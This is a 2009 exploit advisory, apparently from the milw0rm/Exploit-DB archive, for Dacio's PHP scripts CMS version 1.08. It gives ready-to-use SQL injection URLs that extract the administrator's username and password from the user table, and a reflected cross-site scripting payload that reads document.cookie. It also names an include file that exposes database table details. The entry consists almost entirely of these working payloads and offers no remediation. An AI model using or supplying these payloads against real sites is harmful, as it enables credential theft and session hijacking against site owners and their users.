dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure

EDB-ID:

8042

CVE:

N/A


Platform:

PHP

Published:

2009-02-11

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
=                                 XORON 2009(C)
=
=               Dacio's PHP scripts CMS v1.08 Remote SQL Injection Vuln.      
=             
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Script:   Dacio's PHP scripts CMS, version 1.08
= Price:      $Free
=
= Author: xoron
=
= Tesekkurler unutmayan VolqaN!
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= BUGS   
=
=  Sql Injections:
=      /?Kat=-1/**/union/**/select/**/username/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*
=      /?Kat=-1/**/union/**/select/**/userpass/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*
=     
=
=  XSS Vuln:
=      /index.php?search_string="><script>alert(document.cookie)</script>
=
=  MySQL Tables:
=      /include/funkcije.inc
=                                      
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2009-02-11]